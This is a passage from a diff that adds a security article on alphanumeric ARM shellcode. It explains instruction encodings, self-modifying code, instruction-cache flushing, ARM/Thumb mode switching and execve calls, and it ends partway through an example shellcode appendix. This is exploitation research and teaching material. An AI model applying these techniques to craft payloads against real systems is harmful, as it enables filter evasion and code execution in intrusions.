+ |cond | 0| 1| I| 0| U| 1| 1| 0|  Rn |  Rd |  addr_mode  |
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+
+ The structure of STM is very similar to the structure of the LDM
+ operation, and the structure of STRB(T) is very similar to LDRB(T).
+ Hence, comparable constraints apply. The only difference is that
+ other values for Rn must be used in order to generate an alphanumeric
+ character for the third byte of the instruction.
+
+- SUB:  Syntax: SUB{<cond>}{S} <Rd>, <Rn>, <shifter_operand>
+
+  31 28 27 26 25 24 23 22 21 20 19 16 15 12 11                0
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
+ |cond | 0| 0| I| 0| 0| 1| 0| S|  Rn |  Rd |  shifter_operand  |
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
+
+  RSB:  Syntax: RSB{<cond>}{S} <Rd>, <Rn>, <shifter_operand>
+
+  31 28 27 26 25 24 23 22 21 20 19 16 15 12 11                0
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
+ |cond | 0| 0| I| 0| 0| 1| 1| S|  Rn |  Rd |  shifter_operand  |
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
+
+ To get the second byte of the instruction to be alphanumeric, Rn
+ and the S bit must be set accordingly. In addition, Rd cannot be
+ one of the high registers, or R0-R2. As with the previous
+ instructions, we refer you to the ARM architecture reference manual
+ for a detailed instruction of the shifter operand.
+
+- SWI:  Syntax: SWI{<cond>} <immed_24>
+
+  31 28 27 26 25 24 23                         0
+ +-----+--+--+--+--+----------------------------+
+ |cond | 1| 1| 1| 1|          immed_24          |
+ +-----+--+--+--+--+----------------------------+
+
+ As will become clear further in the article, it was essential for
+ us that the first byte of the SWI call is alphanumeric.
+ Fortunately, this can be accomplished by using one of the condition
+ codes discussed in the previous section. The other three bytes are
+ fully determined by the immediate value that is passed as the
+ operand of the SWI instruction.
+
+
+----[ 2.4 Getting a known value in a register
+
+When our shellcode starts executing, we are faced with a problem:
+We do not know which values the registers contain. So we must place
+our own value in a register, however we don't have any traditional
+instructions for doing this. We can't use MOV because that is not
+alphanumeric. So we must make do with our remaining instructions.
+If we look at our arithmetic instructions, we can't EOR or SUB 
+a register with/from itself to get a 0 into a register as using 
+3 registers as arguments is not alphanumeric. We could EOR or SUB
+with an immediate, but we don't know the values in the registers
+so we can't give an appropriate immediate which will return the
+expected value.
+Given that these are our only arithmetic instructions, we can't
+arithmetically get a known value into a register. So our approach
+has been to use LDR. Since we know which code we're writing, we can
+use our shellcode as data and load a byte from the shellcode into a 
+register.
+
+This is done as follows:
+    SUB    r3, pc, #48
+    LDRB   r3, [r3, #-48]
+
+PC will always point to our shellcode, however we can't directly
+access it in an LDR instruction as this would result in
+non-alphanumeric code. So we copy PC to R3 by subtracting 48 from
+PC. Then we use R3 in our LDRB instruction to load a known byte from
+our shellcode into R3 (we use an immediate offset to ensure that the
+last byte of the instruction is alphanumeric). Once this is done we
+can use R3 as the base register for loading values into other
+registers. Subtracting 48 from R3 will give us 0, subtracting 49
+will give us -1, performing an exclusing or with a known value will 
+give us another known value, etc.
+
+
+----[ 2.5 Writing to R0-R2
+
+One of the constraints, mentioned in section 2.3 on most functions
+that have an Rd operand, is that registers R0 to R2 cannot be used
+as destination register. The reason is that the destination register
+is encoded in the four most significant bits of the third byte of an
+operation. If these bits are set to the value 0, 1 or 2, this would
+generate a byte that is not alphanumerical.
+
+On ARM processors, registers R0 to R3 are used to transfer
+parameters to function calls. If the function has more than 4
+parameters, the additional parameters are pushed to the stack. This
+poses a problem for us, because we will need to populate registers
+R0 to R3 in our shellcode, in order to pass arguments to functions
+and system calls. However, it's not easy to write to the contents of
+these registers, because most operations do not support having R0-R2
+as a destination register.
+
+There is, however, one operation that we can use to write to the
+three lowest registers, without generating non-alphanumeric
+instructions. The LDM instruction loads values from the stack into
+multiple registers. It encodes the list of registers it needs to
+write to in the last two bytes of the instruction. Hence, if bits 0
+to 2 are set, registers R0 to R2 will be used to write data to. In
+order to get the bytes of the instruction to become alphanumeric, we
+have to add some other registers to the list. In the example
+shellcode, we will use registers R3 to R7 to do our calculations,
+store the results to the stack, and then load the results in R0 to
+R2 with the LDM instruction.
+
+Thumb mode doesn't suffer from this problem, because the resulting
+register is encoded differently.
+
+
+----[ 2.6 Self-modifying Code
+
+With the instructions that remain after discarding all
+non-alphanumeric bytes, it's pretty hard to write interesting
+shellcode. There's only limited support for arithmetic operations,
+which makes it difficult to do the calculations that are necessary
+to make system calls. In addition, there's no branch instruction
+either, making loops impossible. So it seems that we are not even
+Turing complete.
+
+An interesting option would be to switch from the ARM to the Thumb
+instruction set. Since thumb instructions are shorter, it is likely
+that more instructions are available for this instruction set.
+However, in order to go from ARM to Thumb mode, we need the BX
+instruction, which executes a branch and an optional exchange of
+processor state. This instruction is, however, not alphanumeric.
+
+Another possibility is to write self-modifying code. The basic idea
+is to compute and write non-alphanumeric instructions to memory,
+using only alphanumeric instructions. Then, when the desired code is
+written in memory, simply jump to the instructions to execute them.
+
+Let's take a look at an example. To keep this simple, we consider
+here non-alphanumeric shellcode. Only null bytes are not allowed.
+Imagine you want to execute the instruction:
+
+    mov r0, #0
+
+The resulting bytes for this instruction are 0xe3a00000. Since there
+are two null bytes in this instruction, we will either need another
+instruction or self-modifying code. In this example, we will use
+self-modifying code:
+
+    ldrh   r1, [pc, #6]
+    eor    r1, #384
+    strh   r1, [pc, #-2]
+    .byte 0xe3, 0xa0, 0x80, 0x01
+
+In this short code fragment, we load the 0x80 and 0x01 bytes in
+register R1, we XOR them with 384 (which results in the value 0),
+and we store the result back over the original instruction. This
+code has no null bytes in it anymore.
+
+
+----[ 2.7 The Instruction Cache
+
+ARM processors have an instruction cache which makes writing
+self-modifying code hard to do since all the instructions that are
+being executed will most likely already have been cached. The Intel
+architecture has a specific requirement to be compatible with
+self-modifying code and as such, will make sure that when code is
+modified in memory the cache that possibly contains those
+instructions is invalidated. ARM has no such requirement, which
+means that the instructions that have been modified in memory could
+be different from the instructions that are actually executed since
+they could have been cached. Given the size of the instruction cache
+(16kb on our processor), and the proximity of the modified
+instructions it is very hard to write self-modifying shellcode
+without having to flush the instruction cache.
+
+One way of ensuring that we can bypass the instruction cache is to
+use the MCR instruction, which allows us to move a register to the
+system coprocessor and is alphanumeric. We can set a specific bit in
+a register and then move that register to the status register of the
+system coprocessor, allowing us to turn off the instruction cache.
+However, as we mentioned in section 2.3, this instruction is
+privileged before ARMv6. Because it is not usable in all shellcode
+as such, we will not discuss it.
+
+These cache issues and the fact that we can't just turn off the
+cache are the reasons why the fact that the SWI instruction can be
+represented alphanumerically was essential: we can't modify the SWI
+instruction in memory before flushing the cache, but we will need
+this instruction to perform a flush of the instruction cache. On
+ARM/Linux, the system call for a cache flush is 0x9F0002. None of
+these bytes are alphanumeric and since they are issued as part of an
+instruction this could result in a problem for our self-modifying
+code. However, SWI generates a software interrupt and to the
+interrupt handler, 0x9F0002 is actually data and as a result will
+not be read via the instruction cache, so if we modify the argument
+to SWI in our self-modifyign code, the argument will be read
+correctly.
+
+In non-alphanumeric code, we would flush the instruction cache with
+this sequence of operations:
+
+    mov   r0, #0
+    mov   r1, #-1
+    mov   r2, #0
+    swi   0x9F0002
+
+Since these instructions generate a number of non-alphanumeric
+characters, we will need self-modifying code techniques to use this
+in the shellcode.
+
+
+----[ 2.8 Going to Thumb Mode
+
+As discussed in section 1.5, we don't need to go into Thumb mode
+to make our shellcode work, but it is more convenient since we only
+need to make 2 bytes alphanumeric per instruction rather than 4.
+
+Below is an example that will get us into Thumb mode:
+
+    sub r6, pc, #-1
+    bx r6
+
+However, the BX instruction is not alphanumeric, so we must
+overwrite our shellcode to execute the correct instruction. We must
+modify this instruction before executing the system call to flush 
+the instruction cache.
+
+Below is the list of Thumb instructions and their constraints with
+respect to processor version and if it's possible to display them
+alphanumerically.
+
++-------------+---------+--------------+
+| instruction | version | disqualifier |
++-------------+---------+--------------+
+| ADC         |         |              |
+| ADD (1)     |         | IZ:14-13     |
+| ADD (2)     |         |              |
+| ADD (3)     |         | IZ:14-13     |
+| ADD (4)     |         |              |
+| ADD (5)     |         | IO: 15       |
+| ADD (6)     |         | IO: 15       |
+| ADD (7)     |         | IO: 15       |
+| AND         |         | Pattern is @ |
+| ASR (1)     |         | IZ:14-13     |
+| ASR (2)     |         |              |
+| B (1)       |         | IO:15        |
+| B (2)       |         | IO:15        |
+| BIC         |         | IO:7         |
+| BKPT        | 5T+     | IO:15        |
+| BL          |         | IO:15        |
+| BLX (1)     | 5T+     | IO:15        |
+| BLX (2)     | 5T+     | IO:7         |
+| BX          |         |              |
+| CMN         |         | IO:7         |
+| CMP (1)     |         |              |
+| CMP (2)     |         | IO:7         |
+| CMP (3)     |         |              |
+| CPS         | 6+      | IO:7         |
+| CPY         | 6+      |              |
+| EOR         |         | Pattern is @ |
+| LDMIA       |         | IO:15        |
+| LDR (1)     |         |              |
+| LDR (2)     |         |              |
+| LDR (3)     |         |              |
+| LDR (4)     |         | IO:15        |
+| LDRB (1)    |         |              |
+| LDRB (2)    |         |              |
+| LDRH (1)    |         | IO:15        |
+| LDRH (2)    |         |              |
+| LDRSB       |         |              |
+| LDRSH       |         |              |
+| LSL (1)     |         | IZ: 14-13    |
+| LSL (2)     |         | IO: 7        |
+| LSR (1)     |         | IZ: 14-13    |
+| LSR (2)     |         | IO: 7        |
+| MOV (1)     |         | IZ: 14,12    |
+| MOV (2)     |         | IZ: 14-13    |
+| MOV (3)     |         |              |
+| MUL         |         |              |
+| MVN         |         | IO:7         |
+| NEG         |         |              |
+| ORR         |         |              |
+| POP         |         | IO:15        |
+| PUSH        |         | IO:15        |
+| REV         | 6+      | IO:15        |
+| REV16       | 6+      | IO:15        |
+| REVSH       | 6+      | IO:15        |
+| ROR         |         | IO:7         |
+| SBC         |         | IO:7         |
+| SETEND      | 6+      | IO:15        |
+| STMIA       |         | IO:15        |
+| STR (1)     |         |              |
+| STR (2)     |         |              |
+| STR (3)     |         | IO:15        |
+| STRB (1)    |         |              |
+| STRB (2)    |         |              |
+| STRH (1)    |         | IO:15        |
+| STRH (2)    |         |              |
+| SUB (1)     |         | IZ: 14-13    |
+| SUB (2)     |         |              |
+| SUB (3)     |         | IZ: 14-13    |
+| SUB (4)     |         | IZ:15        |
+| SWI         |         | IZ:15        |
+| SXTB        | 6+      | IZ:15        |
+| SXTH        | 6+      | IZ:15        |
+| TST         |         |              |
+| UXTB        | 6+      | IZ:15        |
+| UXTH        | 6+      | IZ:15        |
++-------------+---------+--------------+
+
+If we remove instructions which are not available on all ARM
+architectures, can not be represented alphanumerically or
+require special hardware, and then group together the instructions
+with similar purposes, we get the following list of instructions
+    - ADC: Add with Cary
+    - ADD: Add
+    - ASR: Arithmetic Shift Right
+    - BX:  Branch and Exchange
+    - CMP: Compare
+    - LDR: Load Register
+    - MOV: Move
+    - MUL: Multiply
+    - NEG: Negate
+    - ORR: Logical Or
+    - STR: Store Register
+    - SUB: Substract
+    - TST: Test
+
+As you can see we have a lot more instructions available in Thumb
+mode than we did in ARM mode. However there are many constraints on
+the use of these instructions. For every instruction we can only use
+specific registers or specific values. The constraints here are more
+esoteric than they are for ARM because of the limited size of
+instructions. We will go over each instructions and its
+limitations.
+
+- ADC:        Syntax: ADC <Rd>, <Rm>
+         15 14 13 12 11 10  9  8  7  6  5  3  2  0
+        +--+--+--+--+--+--+--+--+--+--+-----+-----+
+        | 0| 1| 0| 0| 0| 0| 0| 1| 0| 1|  Rm |  Rd |
+        +--+--+--+--+--+--+--+--+-----+-----+-----+
+        Since bit 7 is set to 0 and bit 6 is set to one, we can use 
+        just about any low register for Rm and Rd, the only 
+        combination of registers that we must exclude is the use of R0 as 
+        both Rm and Rd since that would result in 0x40 or an '@'.
+        The main problem with this instruction is that we must know the 
+        value of the carry flag as it will be added to the result of the 
+        addition.
+
+- ADD: There are seven versions of the thumb mode ADD instruction listed
+        in the reference manual. We will refer to them as the reference
+        manual does, i.e. ADD (1) to ADD (7). 
+        ADD (1), ADD (3), ADD (5), ADD (6) and ADD (7) can not be used        
+        because their first byte is not alphanumeric.
+        This leaves us with:
+                - ADD (2): add a constant value to a register
+                Syntax: ADD <Rd>, #<imm_8>
+                 15 14 13 12 11 10  8 7              0
+                +--+--+--+--+--+-----+---------------+
+                | 0| 0| 1| 1| 0|  Rd |      imm_8    |
+                +--+--+--+--+--+-----+---------------+
+                Rd can be any low register but imm_8 must follow the 
+                constraints of being alphanumeric: 
+                        - 47 < imm_8 < 123
+                        - imm_8 is not 58-64 or 91-96.
+                - ADD (4): adds the value of two registers of which one or 
+                both must be a high register.
+                Syntax: ADD <Rd>, <Rm>
+                 15 14 13 12 11 10  9  8  7   6  5   3  2  0
+                +--+--+--+--+--+--+--+--+---+---+-----+-----+
+                | 0| 1| 0| 0| 0| 1| 0| 0| H1| H2|  Rm |  Rd |
+                +--+--+--+--+--+--+--+--+---+---+-----+-----+
+                With H1 = 1 if Rd is a high register and H2 = 1 if Rm 
+                is a high register.
+                In our case the destination register, Rd may not be a high 
+                register because that would set bit 7 of the instruction
+                to 1. As a result, we can only use this instruction to add
+                the contents of a high register to a low one. However
+                since bit 7 must be 0 and bit 6 must be 1, we can't use
+                register R8 as Rm and R0 as Rd together (i.e. we can't do
+                ADD r0, r8) since that would result in the second byte
+                being an '@'. In theory we could use this instruction to
+                be able to add 2 low registers to each other, since for 
+                some registers the encoding would still be alphanumeric,
+                however the reference manual specifies that if both
+                registers are low, then the result is unpredictable. So
+                the behavior may vary from one processor version to the
+                next.
+
+- ASR: There are two versions of ASR, ASR (1) and (2) respectively.
+        ASR (1) allows the shifting of a register by a constant, however
+        this is not alphanumeric. So we must use the second version of
+        this instruction, ASR (2), which shifts a register based on the
+        value in another register. 
+        Syntax: ASR <Rd>, <RS>
+         15 14 13 12 11 10  9  8  7  6  5  3  2  0
+        +--+--+--+--+--+--+--+--+--+--+-----+-----+
+        | 0| 1| 0| 0| 0| 0| 0| 1| 0| 0|  Rs |  Rd |
+        +--+--+--+--+--+--+--+--+-----+-----+-----+
+        Since bits 7 and 6 of ASR are 0, the first 2 bits of Rs must be 1.
+        This means that Rs must be either R6 or R7.
+
+- BX: Syntax: BX <Rm>
+       15 14 13 12 11 10  9  8  7  6  5   3  2  0
+      +--+--+--+--+--+--+--+--+--+---+-----+-----+
+      | 0| 1| 0| 0| 0| 1| 1| 1| 0| H2|  Rm | SBZ |
+      +--+--+--+--+--+--+--+--+--+---+-----+-----+
+      The branch and exchange instruction can be used to enter ARM mode.
+      This is useful if we have code which starts off in Thumb mode: 
+      since SWI is not alphanumeric in Thumb, we can't flush the cache 
+      if we write self-modifying code. We can, however use the 
+      BX instruction to get into ARM mode, where the SWI instruction is
+      alphanumeric. We discuss this in more detail below.
+      If bit 6 is 0, we must have bits 5 and 4 set to 1, this means that
+      we can only use R6 and R7 from the low registers. For the high
+      registers we can use R9, R10, R11, R13, R14 and R15 
+
+- CMP:  There are three versions of CMP: CMP (1) to CMP (3). CMP (2) is
+        not alphanumeric.
+        - CMP (1) compares a register to an immediate.
+          Syntax: CMP <Rn>, #<imm_8>
+            15 14 13 12 11 10  8 7             0
+           +--+--+--+--+--+-----+---------------+
+           | 0| 0| 1| 0| 1|  Rn |      imm_8    |
+           +--+--+--+--+--+-----+---------------+
+          As with ADD (2), Rn can be any low register but imm_8 must
+          follow the constraints of being alphanumeric: 
+                - 47 < imm_8 < 123
+                - imm_8 is not 58-64 or 91-96.
+        - CMP (3) compares the value of two registers of which one or 
+          both must be a high register.
+          Syntax: CMP <Rn>, <Rm>
+            15 14 13 12 11 10  9  8  7   6  5   3  2  0
+           +--+--+--+--+--+--+--+--+---+---+-----+-----+
+           | 0| 1| 0| 0| 0| 1| 0| 1| H1| H2|  Rm |  Rd |
+           +--+--+--+--+--+--+--+--+---+---+-----+-----+
+          The same restrictions apply as for ADD. In our case Rn may not 
+          be a high register because that would set bit 7 of the 
+          instruction to 1. As a result, we can only use this instruction
+          to compare the contents of a high register to a low one.
+          As with ADD, Rm can not be R8 if Rn is R0 and comparing 
+          two low registers is unpredictable. 
+       
+- LDR:  There are many versions of this instruction: LDR (1) to LDR (4), 
+        LDRB (1), LDRB (2), LDRH (1), LDRH (2), LDRSB and LDRSH. Of these, 
+        only LDR (4) and LDRH (1) are not alphanumeric.
+        - LDR (1) Loads a word from memory address stored in a register 
+        into another register. A word offset of maximum 5 bits (i.e. the 
+        value is multiplied by 4) can be given to the  register containing 
+        the memory address.
+        Syntax: LDR <Rd>, [<Rn>, #<imm_5> * 4]
+         15 14 13 12 11 10       6  5  3  2  0
+        +--+--+--+--+--+----------+-----+-----+
+        | 0| 1| 1| 0| 1|  imm_5   |  Rn |  Rd |
+        +--+--+--+--+--+----------+-----+-----+
+        The constraints on register use in this case depend on the value
+        of the immediate. However, we can conclude that in no cases can Rn
+        and Rd both be R0 at the same time.
+        If imm_5 is uneven (i.e. bit 6 is set) , then all other registers 
+        can be used. However, if imm_5 is even (i.e. bit 6 is not set),
+        then only R6 and R7 can be used as Rn.
+        - LDR (2) does the same as LDR (1) except that the offset to the 
+        register containing the memory address to read from is stored in a 
+        register and as a result can be larger than 32.
+        Syntax: LDR <Rd>, [<Rn>, <Rm>]
+         15 14 13 12 11 10  9  8  6  5  3  2  0
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        | 0| 1| 0| 1| 1| 0| 0|  Rm |  Rn |  Rd |
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        Since bit 7 must be 0, Rm is already constrained to registers: R0, 
+        R1, R4 and R5. However, if Rm is R0 or R4, then Rn must be R6 
+        or R7. If Rm is R1 or R5 then Rn and Rd can not both be R0.
+        - LDR (3) loads a word into a register based on an 8 bit offset 
+        from the program counter (PC).
+        Syntax: LDR <Rd>, [PC, #<imm_8> * 4]
+         15 14 13 12 11 10  8 7             0
+        +--+--+--+--+--+-----+---------------+
+        | 0| 1| 0| 0| 1|  Rd |      imm_8    |
+        +--+--+--+--+--+-----+---------------+
+        As with ADD (2) and CMP (1) Rd can be any low register but 
+        imm_8 must follow the constraints of being alphanumeric.
+        - LDRB (1) is essentially the same as LDR (1) except that it loads 
+        a byte from memory instead of a word.
+        Syntax: LDRB <Rd>, [<Rn>, #<imm_5>]
+         15 14 13 12 11 10       6  5  3  2  0
+        +--+--+--+--+--+----------+-----+-----+
+        | 0| 1| 1| 1| 1|  imm_5   |  Rn |  Rd |
+        +--+--+--+--+--+----------+-----+-----+
+        Similar restrictions apply, with the added restriction however
+        that imm_5 must be lower than 12, because otherwise the first byte
+        is larger than 'z' (0x7a). However, if imm_5 is 11 or 10, then
+        bit 7 of the second byte will be set to one, so in reality it must
+        be lower than 10 and not equal 7, 6, 2 or 3.
+        - LDRB (2) is the same as LDR (2) except that it behaves like 
+        LDRB (1), i.e. it loads a byte instead of a word.
+        Syntax: LDRB <Rd>, [<Rn>, <Rm>]
+         15 14 13 12 11 10  9  8  6  5  3  2  0
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        | 0| 1| 0| 1| 1| 1| 0|  Rm |  Rn |  Rd |
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        Since the second byte is identical, the same restrictions as 
+        for LDR (2) apply.
+        - LDRH (2) is the same as LDR (2) and LDRB (2), except it loads a 
+        halfword (16 bits).
+        Syntax: LDRH <Rd>, [<Rn>, <Rm>]
+         15 14 13 12 11 10  9  8  6  5  3  2  0
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        | 0| 1| 0| 1| 1| 0| 1|  Rm |  Rn |  Rd |
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        The same restrictions as for LDR (2) and LDRB (2) apply.
+        - LDRSB is the same as LDRB (2), except that it interprets the
+        byte that it loads as signed.
+        Syntax: LDRSB <Rd>, [<Rn>, <Rm>]
+         15 14 13 12 11 10  9  8  6  5  3  2  0
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        | 0| 1| 0| 1| 0| 1| 1|  Rm |  Rn |  Rd |
+        +--+--+--+--+--+--+--+-----+-----+-----+
+
+        Again, the same restrictions apply as for LDRB(2).
+        - LDRSH is the halfword equivalent of LDRSB.
+        Syntax: LDRSH <Rd>, [<Rn>, <Rm>]
+         15 14 13 12 11 10  9  8  6  5  3  2  0
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        | 0| 1| 0| 1| 1| 1| 1|  Rm |  Rn |  Rd |
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        The same restrictions apply as for LDRB(2) and LDRH (2).
+
+- MOV: There are three versions of this instrction: MOV (1) to MOV (3),
+       but only MOV (3) is alphanumeric. MOV (3) moves to, from or between
+       high registers. 
+       Syntax: MOV <Rd>, <Rm>
+         15 14 13 12 11 10  9  8  7   6  5   3  2  0
+        +--+--+--+--+--+--+--+--+---+---+-----+-----+
+        | 0| 1| 0| 0| 0| 1| 1| 0| H1| H2|  Rm |  Rd |
+        +--+--+--+--+--+--+--+--+---+---+-----+-----+
+       As with other instructions (ADD and CMP) that operate on high 
+       registers, Rd can not be R0 if Rm is R8 and using two low registers
+       is unpredictable.
+
+- MUL: Syntax: MUL <Rd>, <Rm>
+         15 14 13 12 11 10  9  8  7  6  5  3  2  0
+        +--+--+--+--+--+--+--+--+--+--+-----+-----+
+        | 0| 1| 0| 0| 0| 0| 1| 1| 0| 1|  Rm |  Rd |
+        +--+--+--+--+--+--+--+--+--+--+-----+-----+
+       Since the second byte of MUL is identical to the second byte of the 
+       ADC instruction, it has the same limitations. 
+       I.e. the only limitation on registers is that we can't use R0 as
+       both Rm and Rd, all other combinations with low registers are
+       valid.
+
+- NEG: Syntax: NEG <Rd>, <Rm>
+         15 14 13 12 11 10  9  8  7  6  5  3  2  0
+        +--+--+--+--+--+--+--+--+--+--+-----+-----+
+        | 0| 1| 0| 0| 0| 0| 1| 0| 0| 1|  Rm |  Rd |
+        +--+--+--+--+--+--+--+--+--+--+-----+-----+
+       The second byte of NEG is identical to the second bytes of MUL and 
+       ADC, so the same limitations apply.
+
+- STR: As with LDR, there are many versions of STR: STR (1) to STR (3), 
+       STRB (1) and (2), STRH (1) and (2). However STR (3) and STRH (1)
+       are not alphanumeric.
+       - STR (1) the complementary instruction to LDR (1) stores a word 
+        from a register to memory.  As with LDR (1), it will take an 
+        immediate of 5 bytes that it multiplies by 4 and uses as offset
+        for a base register that contains a memory address to write to.
+        Syntax: STR <Rd>, [<Rn>, #<imm_5> * 4]
+         15 14 13 12 11 10       6  5  3  2  0
+        +--+--+--+--+--+----------+-----+-----+
+        | 0| 1| 1| 0| 0|  imm_5   |  Rn |  Rd |
+        +--+--+--+--+--+----------+-----+-----+
+        The same limitations as with LDR (1) apply.
+       - STR (2) is the complementary instruction to LDR (2).
+        Syntax: STR <Rd>, [<Rn>, <Rm>]
+         15 14 13 12 11 10  9  8  6  5  3  2  0
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        | 0| 1| 0| 1| 0| 0| 0|  Rm |  Rn |  Rd |
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        Again, the same limitations as with LDR (2) apply.
+       - STRB (1) is complementary to LDRB (1).
+        Syntax: STRB <Rd>, [<Rn>, #<imm_5>]
+         15 14 13 12 11 10       6  5  3  2  0
+        +--+--+--+--+--+----------+-----+-----+
+        | 0| 1| 1| 1| 0|  imm_5   |  Rn |  Rd |
+        +--+--+--+--+--+----------+-----+-----+
+        Since bit 11 is 0, the limitations are less stringent than with 
+        LDRB (1). As such, the limitations of STR (1) apply rather than
+        the ones of LDRB (1).
+       - STRB (2) is complementary to LDRB (2)
+        Syntax: STRB <Rd>, [<Rn>, <Rm>]
+         15 14 13 12 11 10  9  8  6  5  3  2  0
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        | 0| 1| 0| 1| 0| 1| 0|  Rm |  Rn |  Rd |
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        The same limitations as with LDRB (2) apply.
+       - STRH (2) is complementary to LDRH (2).
+        Syntax: STRH <Rd>, [<Rn>, <Rm>]
+         15 14 13 12 11 10  9  8  6  5  3  2  0
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        | 0| 1| 0| 1| 0| 0| 1|  Rm |  Rn |  Rd |
+        +--+--+--+--+--+--+--+-----+-----+-----+
+        The same limitations apply.
+
+- SUB: There are four versions of SUB, but only SUB (2) is alphanumeric.
+       Syntax: SUB <Rd>, <imm_8>
+         15 14 13 12 11 10  8 7             0
+        +--+--+--+--+--+-----+---------------+
+        | 0| 0| 1| 1| 1|  Rd |      imm_8    |
+        +--+--+--+--+--+-----+---------------+
+       Since the second byte of SUB (2) only contains an immediate, it has 
+       the same limitations as the second byte of ADD (2), CMP (1) and 
+       LDR(3).
+       However, unlike in ADD (2), CMP (1) and LDR (3), we can't use any 
+       register for Rd. Since the first 5 bits of SUB are 00111, this 
+       covers a range of 0x38 to 0x3f. However only 0x38 and 0x39 (the 
+       characters '8' and '9') are alphanumeric. This means that we can 
+       only use registers R0 and R1 as Rd this SUB instruction.
+
+- TST: Syntax: TST <Rn>, <Rm>
+         15 14 13 12 11 10  9  8  7  6  5  3  2  0
+        +--+--+--+--+--+--+--+--+--+--+-----+-----+
+        | 0| 1| 0| 0| 0| 0| 1| 0| 0| 0|  Rm |  Rn |
+        +--+--+--+--+--+--+--+--+--+--+-----+-----+
+        Since bit 7 and 6 are both set to 0, this means that bits 5 and 4
+        must be set to 1. This yields the following restrictions:
+        - Rm must be either: R6 or R7.
+        - If Rm is R6, then Rn can be any other low register.
+        - If Rm is R7, then Rn can only be R0 or R1.
+
+An important instruction that is missing from the above list is the
+SWI instruction. To be able to get around the fact that SWI is not
+alphanumeric in Thumb mode, we overwrite it from ARM mode. However,
+unlike the SWI in ARM mode, the argument to SWI will not be used to
+determine the system call number that we want to call. Instead we
+must place the system call number into R7. Unlike in ARM mode, where
+we must add 0x900000 to the system call number, we can just place
+the number in R7 as is.
+
+An example of calling execve in ARM mode:
+    SWI 0x90000b
+In Thumb mode:
+    MOV r7, #0x0b
+    SWI 48
+
+
+----[ 2.9 Going to ARM Mode
+
+For programs that we wish to exploit that are already running in
+Thumb mode, we still have a problem: we can't write self-modifying
+code in Thumb mode because we can't call SWI to perform a cache
+flush. However, since the BX instruction is alphanumeric in Thumb
+mode, we can use that instruction to get us into ARM mode where we
+can do all the cool stuff we've discussed above. Here is an example
+of a code snippet that gets us into ARM mode:
+
+    BX pc
+    ADD r7, #50
+
+We need the add instruction as a nop instruction because PC will 
+point to the current instruction + 4. The BX pc instruction 
+will be represented alphanumerically as 'G''x'. 
+
+
+
+--[ 3. Conclusion
+
+This article shows that alphanumeric shellcode is realistic on the
+ARM processor, even though it is harder to generate because of the
+nature of the ARM processor. Any operation, including non-alphanumeric
+instructions, can be executed by writing self-modifying code and
+flushing the instruction cache. Consequently, alphanumeric shellcode
+is Turing complete.
+
+The thumb instruction set can be used, if available, to facilitate
+writing shellcode. Its denser instruction structure makes it somewhat
+easier to make it generate alphanumeric bytes. However, having access
+to the thumb instruction set is not required.
+
+
+
+--[ 4. Acknowledgements
+
+The authors would like to thank Frank Piessens, tetsuki and
+tohomo for their contributions to the project which resulted
+in this article.
+
+We would also like to thank HD Moore for his helpful suggestions
+when we were trying to make our shellcode printable.
+
+Shoutouts to the people from nologin/uninformed: arachne, bugcheck,
+dragorn, gamma, h1kari, hdm, icer, jhind, johnycsh, mercy, mjm,
+mu-b, nemo, ninja405, pandzilla, pusscat, rizzo, rjohnson, sih, 
+skape, skywing, slow, trew, vf, warlord, wastedimage, west, X, xbud
+
+
+
+--[ 5. References
+
+[0] The ARM Architecture Reference Manual
+http://www.arm.com/miscPDFs/14128.pdf
+
+[1] Writing ia32 alphanumeric shellcodes
+http://www.phrack.org/issues.html?issue=57&id=18#article
+
+[2] Into my ARMs: Developing StrongARM/Linux shellcode
+http://www.isec.pl/papers/into_my_arms_dsls.pdf
+
+
+
+--[ A. Shellcode Appendix
+
+
+----[ A.0 Writable Memory
+
+For debugging purposes, it is convenient to execute the shellcode as a
+normal application, instead of injecting it into a buffer. However, if
+it's compiled as a normal application, the code will be loaded in
+non-writable code memory. Since our shellcode is self-modifying, the
+application will first have to set the memory to writable before executing
+the code. This can be done with the following code fragment:
+
+    .ARM
+    # set the text section writable
+    MOV      r0, #32768
+    MOV      r1, #4096
+    MOV      r2, #7
+    BL       mprotect
+
+Of course, this is not necessary when the shellcode is injected through a
+buffer overflow. The memory that contains the buffer will always be
+writable.
+
+
+----[ A.1 Example Shellcode
+
+In this example, the shellcode starts up, switches to thumb mode and
+executes the application "/execme". Some of the techniques presented
+here are: getting a known value into a register, modifying our own
+shellcode, flushing the instruction cache, and switching from ARM
+to Thumb.
+
+    # our shellcode starts here
+    # nops
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    # do not change these instructions
+    # we will use them to load a value
+    # into our register
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    # continue nops
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
+    SUBPL    r3, r1, #56
